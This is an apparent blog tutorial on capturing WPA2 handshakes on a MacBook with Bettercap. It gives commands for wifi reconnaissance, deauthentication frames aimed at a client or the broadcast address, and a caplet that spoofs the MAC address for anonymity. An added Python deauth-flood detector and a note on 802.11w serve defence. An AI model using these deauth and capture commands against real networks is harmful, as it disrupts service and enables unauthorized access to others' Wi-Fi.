Capturing WPA2 handshakes on macOS Catalina with Bettercap
Probably all Apple computers with wireless cards are capable of using monitor mode and sending de-authentication frames. Please note that de-authentication is effectively a denial of service. It’s illegal in many places and you might get in trouble, so make sure you have permission to do so.
It’s interesting to look around or troubleshoot wireless connectivity issues. Apple macOS has a “Wireless Diagnostics” app, and I noticed that you can do monitoring and scanning, measure signal strength, etc.
Also, there is a native command-line tool, airport (and a guide [1] on how to capture WPA with it).
In this write-up, I will focus on capturing WPA handshakes with a MacBook Pro and Bettercap [2].
Prerequisites
You need the Homebrew package manager [3] installed. If you don’t have it, use the one-liner below to install it. It will also install the Xcode command line tools and all necessary dependencies. You will need to enter your administrator password, and it will take up to 5 minutes:
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
Installation
Once you have Homebrew, proceed with the command below to install Bettercap:
brew install bettercap
Once it’s installed, you need to install and update the caplets. Bettercap requires sudo privileges:
sudo bettercap -eval "caplets.update; ui.update; q"
Capturing
Now we can run Bettercap to look at what is around us. Please note that I am using an old MacBook Pro from 2012, which has the Ethernet adapter as en0 and the wireless adapter as en1. In your case, the wireless interface might be en0:
sudo bettercap -caplet http-ui -iface en1
This will start the program with the web interface running, so you only need to open this address in your browser:
http://127.0.0.1/
Enable monitor mode in the WiFi tab and press the play button, or in the terminal enter the command below:
wifi.recon on
The WPA2 PSK and PMK authentication process requires a 4-way handshake to exchange a secret key for the first time. Once you have it, you no longer need the full 4-way handshake to verify your device; capturing a 2-way handshake is enough.
Now you can capture wireless traffic all day long, but unless the communication is terminated with a deauthentication frame [4] it’s useless. Bettercap has a feature to deauthenticate clients from the station. Again! Make sure you have permission to do so:
wifi.deauth 11:11:11:11:11:11
You can also opt for the broadcast address FF:FF:FF:FF:FF:FF.
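The deauthentication frames described above are exactly what a wireless IDS watches for. As an added example (not from the original post or Bettercap), this Python snippet parses raw 802.11 management frames and flags deauth floods and broadcast-addressed deauths; the frames, MAC addresses and timestamps are constructed for the demonstration.

```python
# Added example for this write-up (not Bettercap code): flag deauth floods in raw 802.11 management frames (no radiotap header). Addresses and timestamps are constructed.
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH, DISASSOC = 12, 10  # management frame subtypes per IEEE 802.11

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def build_deauth(dst, src, bssid, reason=7, subtype=DEAUTH):
    """Construct a deauth/disassoc frame, used here only as test input."""
    addrs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (dst, src, bssid))
    fc = bytes([subtype << 4, 0x00])  # type 0 (management), given subtype, no flags
    return fc + b"\x00\x00" + addrs + b"\x00\x00" + struct.pack("<H", reason)

def parse_mgmt(frame):
    """Return (subtype, addr1, addr2, addr3, reason) for deauth/disassoc frames, else None."""
    if len(frame) < 26:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    a1, a2, a3 = (mac_str(frame[i:i + 6]) for i in (4, 10, 16))
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    return subtype, a1, a2, a3, reason

def detect_floods(capture, window=10.0, threshold=5):
    """capture: iterable of (timestamp, frame). Returns (kind, transmitter, timestamp) alerts.
    A spoofed deauth carries the real BSSID as addr2, so the sender identity is no signal;
    the rate is. Deauths aimed at the broadcast address are unusual from a real AP and flagged."""
    recent, alerts = defaultdict(list), []
    for ts, frame in capture:
        parsed = parse_mgmt(frame)
        if parsed is None:
            continue
        _, a1, a2, _, _ = parsed
        if a1 == BROADCAST:
            alerts.append(("broadcast-deauth", a2, ts))
        recent[a2] = [t for t in recent[a2] if ts - t <= window] + [ts]  # sliding window
        if len(recent[a2]) == threshold:
            alerts.append(("deauth-flood", a2, ts))
    return alerts

AP, CLIENT = "02:00:00:00:aa:01", "02:00:00:00:bb:02"  # constructed addresses
SAMPLE_CAPTURE = [(0.0, build_deauth(CLIENT, AP, AP, reason=3))]  # one isolated deauth
SAMPLE_CAPTURE += [(5.0 + i * 0.25, build_deauth(CLIENT, AP, AP)) for i in range(6)]  # burst
SAMPLE_CAPTURE += [(7.0, build_deauth(BROADCAST, AP, AP)), (8.0, bytes([0x80, 0]) + bytes(30))]
```

Protected Management Frames (IEEE 802.11w) is the mitigation on the network side: with PMF required, clients discard unauthenticated deauth frames like these.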
Automation
Now that we know how it works, we can modify our caplet for daily usage. Basically we can make it like pwnagotchi, but we will call it pwnacintosh :)
I am adding extra security, anonymization, and service configurations.
There is no need to create a new caplet; we can modify the existing HTTPS caplet:
sudo nano /usr/local/share/bettercap/caplets/https-ui.cap
I just need to change the username and password from the defaults, user and pass:
set api.rest.username pwnacintosh
set api.rest.password pwnacintosh
Add some anonymity to the wireless interface:
set wifi.interface en1
set mac.changer.iface en1
set mac.changer.address f0:a1:c2:34:a5:f6
And the last thing we need to do is add the commands that enable the services:
mac.changer on
wifi.recon on
Save and close. We will make a copy of the https-ui caplet, because if you update caplets later it will be reset to the defaults:
cd /usr/local/share/bettercap/caplets/
sudo cp https-ui.cap pwnacintosh.cap
It’s time to run Bettercap with one argument. The SSL certificates will be generated automatically on the first run:
sudo bettercap -caplet pwnacintosh
Use your current IP or the localhost address to open the Bettercap web application:
https://127.0.0.1/